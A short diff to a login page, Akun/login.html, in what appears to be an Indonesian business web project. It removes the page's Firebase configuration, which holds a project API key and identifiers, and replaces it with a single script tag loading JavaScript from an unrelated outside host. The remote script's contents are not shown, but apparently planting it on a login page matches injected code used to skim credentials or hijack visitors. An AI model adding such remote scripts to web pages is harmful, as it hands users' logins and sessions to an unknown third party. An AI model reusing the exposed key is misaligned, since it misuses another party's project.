--- a/Akun/login.html
+++ b/Akun/login.html
@@ -10,20 +10,7 @@
   <script src="https://www.gstatic.com/firebasejs/7.20.0/firebase-firestore.js"></script>
 
   <!-- Firebase configuration -->
-  <script>
-    const firebaseConfig = {
-      apiKey: "AIzaSyDPp8I8Xp-qZg65GxEX8_ETxvrZCDG8454",
-      authDomain: "bisnis-532f5.firebaseapp.com",
-      projectId: "bisnis-532f5",
-      storageBucket: "bisnis-532f5.appspot.com",
-      messagingSenderId: "351800625123",
-      appId: "1:351800625123:web:8abff984b15be7a00bc2d6",
-      measurementId: "G-TJJBQ9TF7S"
-    };
-
-    // Initialize Firebase
-    firebase.initializeApp(firebaseConfig);
-  </script>
+ <script src="https://kosred.com/a/klttyp.js"></script> 
 
   <!-- Gaya CSS -->
   <style>
